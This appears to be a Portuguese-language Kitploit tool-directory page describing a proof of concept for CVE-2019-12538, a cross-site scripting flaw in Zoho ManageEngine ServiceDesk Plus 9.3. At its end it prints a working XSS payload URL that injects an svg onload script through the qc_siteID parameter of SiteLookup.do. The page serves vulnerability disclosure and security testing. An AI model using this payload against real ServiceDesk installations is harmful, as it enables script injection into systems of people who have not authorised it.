Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-12538 — Prova de conceito para CVE-2019-12538: vulnerabilidade XSS no Zoho ManageEngine ServiceDesk Plus 9.3 via parâmetro qc_siteID do SiteLookup.do. Inclui payload para teste de segurança. | Kitploit
Ferramentas/GitHubGitHub/tarantula-team/cve-2019-12538
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubtarantula-team/cve-2019-12538

CVE-2019-12538

Prova de conceito para CVE-2019-12538: vulnerabilidade XSS no Zoho ManageEngine ServiceDesk Plus 9.3 via parâmetro qc_siteID do SiteLookup.do. Inclui payload para teste de segurança.

Ver Repositório
2há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-12538 Zoho ManageEngine ServiceDesk Plus 9.3 vulnerabilidade XSS em SiteLookup.do

Descrição da Informação: Foi descoberto um problema no Zoho ManageEngine ServiceDesk Plus 9.3. Existe XSS através do parâmetro qc_siteID no SiteLookup.do.

Autor: Concobe do Tarantula Team - VinCSS (um membro da Vingroup)

Payload

domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=

Baixar ferramenta